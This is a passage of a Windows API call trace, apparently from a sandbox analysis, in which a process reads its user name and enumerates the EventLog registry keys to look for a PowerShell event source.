	[0385.632] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x0) returned 0x2
	[0385.632] RegOpenKeyExW (in: hKey=0x308, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x340) returned 0x0
	[0385.632] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x0) returned 0x2
	[0385.632] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x344) returned 0x0
	[0385.633] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x0) returned 0x2
	[0385.633] RegOpenKeyExW (in: hKey=0x308, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x348) returned 0x0
	[0385.633] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x0) returned 0x2
	[0385.633] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x34c) returned 0x0
	[0385.633] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x350) returned 0x0
	[0385.633] RegCloseKey (hKey=0x350) returned 0x0
	[0385.633] RegCloseKey (hKey=0x308) returned 0x0
	[0385.634] RegCloseKey (hKey=0x34c) returned 0x0
	[0385.648] CoTaskMemAlloc (cb=0x804) returned 0x1b793160
	[0385.648] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b793160, nSize=0x24d2a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d2a8) returned 0x1
	[0385.808] CoTaskMemFree (pv=0x1b793160) 
	[0385.809] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0385.809] GetUserNameW (in: lpBuffer=0x1027c0, pcbBuffer=0x24d2e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d2e8) returned 1
	[0385.809] CoTaskMemFree (pv=0x1027c0) 
	[0387.423] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24cfe8 | out: phkResult=0x24cfe8*=0x338) returned 0x0
	[0387.423] RegQueryInfoKeyW (in: hKey=0x338, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24cf5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24cf58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24cf5c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24cf58*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.423] CoTaskMemFree (pv=0x0) 
	[0387.423] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.423] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x0, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.423] CoTaskMemFree (pv=0x1027c0) 
	[0387.423] CoTaskMemFree (pv=0x0) 
	[0387.423] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.423] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x1, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.423] CoTaskMemFree (pv=0x1027c0) 
	[0387.423] CoTaskMemFree (pv=0x0) 
	[0387.423] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.423] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x2, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.423] CoTaskMemFree (pv=0x1027c0) 
	[0387.423] CoTaskMemFree (pv=0x0) 
	[0387.423] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.423] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x3, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.423] CoTaskMemFree (pv=0x1027c0) 
	[0387.423] CoTaskMemFree (pv=0x0) 
	[0387.423] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.423] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x4, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.424] CoTaskMemFree (pv=0x1027c0) 
	[0387.424] CoTaskMemFree (pv=0x0) 
	[0387.424] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.424] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x5, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.424] CoTaskMemFree (pv=0x1027c0) 
	[0387.424] CoTaskMemFree (pv=0x0) 
	[0387.424] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.424] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x6, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.424] CoTaskMemFree (pv=0x1027c0) 
	[0387.424] CoTaskMemFree (pv=0x0) 
	[0387.424] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.424] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x7, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.424] CoTaskMemFree (pv=0x1027c0) 
	[0387.424] CoTaskMemFree (pv=0x0) 
	[0387.424] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.424] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x8, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.424] CoTaskMemFree (pv=0x1027c0) 
	[0387.424] CoTaskMemFree (pv=0x0) 
	[0387.424] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x33c) returned 0x0
	[0387.424] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x0) returned 0x2
	[0387.424] RegOpenKeyExW (in: hKey=0x338, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x340) returned 0x0
	[0387.424] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x0) returned 0x2
	[0387.424] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x344) returned 0x0
	[0387.425] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x0) returned 0x2
	[0387.425] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x348) returned 0x0
	[0387.425] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x0) returned 0x2
	[0387.425] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x330) returned 0x0
	[0387.425] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x0) returned 0x2
	[0387.425] RegOpenKeyExW (in: hKey=0x338, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x304) returned 0x0
	[0387.425] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x0) returned 0x2
	[0387.425] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x30c) returned 0x0
	[0387.425] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x0) returned 0x2
	[0387.425] RegOpenKeyExW (in: hKey=0x338, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x320) returned 0x0
	[0387.425] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x0) returned 0x2
	[0387.426] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x334) returned 0x0
	[0387.426] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x1c8) returned 0x0
	[0387.426] RegCloseKey (hKey=0x1c8) returned 0x0
	[0387.426] RegCloseKey (hKey=0x338) returned 0x0
	[0387.426] RegCloseKey (hKey=0x334) returned 0x0
	[0387.427] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24cfe8 | out: phkResult=0x24cfe8*=0x334) returned 0x0
	[0387.427] RegQueryInfoKeyW (in: hKey=0x334, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24cf5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24cf58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24cf5c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24cf58*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.427] CoTaskMemFree (pv=0x0) 
	[0387.427] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.427] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x0, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.427] CoTaskMemFree (pv=0x1027c0) 
	[0387.427] CoTaskMemFree (pv=0x0) 
	[0387.427] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.427] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x1, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.427] CoTaskMemFree (pv=0x1027c0) 
	[0387.427] CoTaskMemFree (pv=0x0) 
	[0387.427] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.427] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x2, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.428] CoTaskMemFree (pv=0x1027c0) 
	[0387.428] CoTaskMemFree (pv=0x0) 
	[0387.428] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.428] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x3, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.428] CoTaskMemFree (pv=0x1027c0) 
	[0387.428] CoTaskMemFree (pv=0x0) 
	[0387.428] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.428] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x4, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.428] CoTaskMemFree (pv=0x1027c0) 
	[0387.428] CoTaskMemFree (pv=0x0) 
	[0387.428] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.428] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x5, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.428] CoTaskMemFree (pv=0x1027c0) 
	[0387.428] CoTaskMemFree (pv=0x0) 
	[0387.428] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.428] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x6, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.428] CoTaskMemFree (pv=0x1027c0) 
	[0387.428] CoTaskMemFree (pv=0x0) 
	[0387.428] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.428] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x7, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.428] CoTaskMemFree (pv=0x1027c0) 
	[0387.428] CoTaskMemFree (pv=0x0) 
	[0387.428] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.428] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x8, lpName=0x1027c0, lpcchName=0x24cfe8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24cfe8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.428] CoTaskMemFree (pv=0x1027c0) 
	[0387.428] CoTaskMemFree (pv=0x0) 
	[0387.428] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x338) returned 0x0
	[0387.428] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x0) returned 0x2
	[0387.429] RegOpenKeyExW (in: hKey=0x334, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x1c8) returned 0x0
	[0387.429] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x0) returned 0x2
	[0387.429] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x1d0) returned 0x0
	[0387.429] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x0) returned 0x2
	[0387.429] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x1cc) returned 0x0
	[0387.429] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x0) returned 0x2
	[0387.429] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x354) returned 0x0
	[0387.429] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x0) returned 0x2
	[0387.429] RegOpenKeyExW (in: hKey=0x334, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x358) returned 0x0
	[0387.429] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x0) returned 0x2
	[0387.429] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x35c) returned 0x0
	[0387.429] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x0) returned 0x2
	[0387.430] RegOpenKeyExW (in: hKey=0x334, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x360) returned 0x0
	[0387.430] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x0) returned 0x2
	[0387.430] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x364) returned 0x0
	[0387.430] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d048 | out: phkResult=0x24d048*=0x368) returned 0x0
	[0387.430] RegCloseKey (hKey=0x368) returned 0x0
	[0387.430] RegCloseKey (hKey=0x334) returned 0x0
	[0387.430] RegCloseKey (hKey=0x364) returned 0x0
	[0387.432] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24cfb8 | out: phkResult=0x24cfb8*=0x364) returned 0x0
	[0387.432] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24cf2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24cf28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24cf2c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24cf28*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.432] CoTaskMemFree (pv=0x0) 
	[0387.432] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.432] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x1027c0, lpcchName=0x24cfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24cfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.432] CoTaskMemFree (pv=0x1027c0) 
	[0387.432] CoTaskMemFree (pv=0x0) 
	[0387.432] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.432] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x1027c0, lpcchName=0x24cfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24cfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.433] CoTaskMemFree (pv=0x1027c0) 
	[0387.433] CoTaskMemFree (pv=0x0) 
	[0387.433] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.433] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x1027c0, lpcchName=0x24cfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24cfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.433] CoTaskMemFree (pv=0x1027c0) 
	[0387.433] CoTaskMemFree (pv=0x0) 
	[0387.433] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.433] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x1027c0, lpcchName=0x24cfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24cfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.433] CoTaskMemFree (pv=0x1027c0) 
	[0387.433] CoTaskMemFree (pv=0x0) 
	[0387.433] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.433] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x1027c0, lpcchName=0x24cfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24cfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.433] CoTaskMemFree (pv=0x1027c0) 
	[0387.433] CoTaskMemFree (pv=0x0) 
	[0387.433] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.433] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x1027c0, lpcchName=0x24cfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24cfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.433] CoTaskMemFree (pv=0x1027c0) 
	[0387.433] CoTaskMemFree (pv=0x0) 
	[0387.433] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.433] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x1027c0, lpcchName=0x24cfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24cfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.433] CoTaskMemFree (pv=0x1027c0) 
	[0387.433] CoTaskMemFree (pv=0x0) 
	[0387.433] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.433] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x1027c0, lpcchName=0x24cfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24cfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.433] CoTaskMemFree (pv=0x1027c0) 
	[0387.433] CoTaskMemFree (pv=0x0) 
	[0387.433] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.433] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x1027c0, lpcchName=0x24cfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24cfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0387.434] CoTaskMemFree (pv=0x1027c0) 
	[0387.434] CoTaskMemFree (pv=0x0) 
	[0387.434] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x334) returned 0x0
	[0387.434] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x0) returned 0x2
	[0387.434] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x368) returned 0x0
	[0387.434] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x0) returned 0x2
	[0387.434] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x36c) returned 0x0
	[0387.434] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x0) returned 0x2
	[0387.434] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x370) returned 0x0
	[0387.434] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x0) returned 0x2
	[0387.434] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x374) returned 0x0
	[0387.434] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x0) returned 0x2
	[0387.434] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x378) returned 0x0
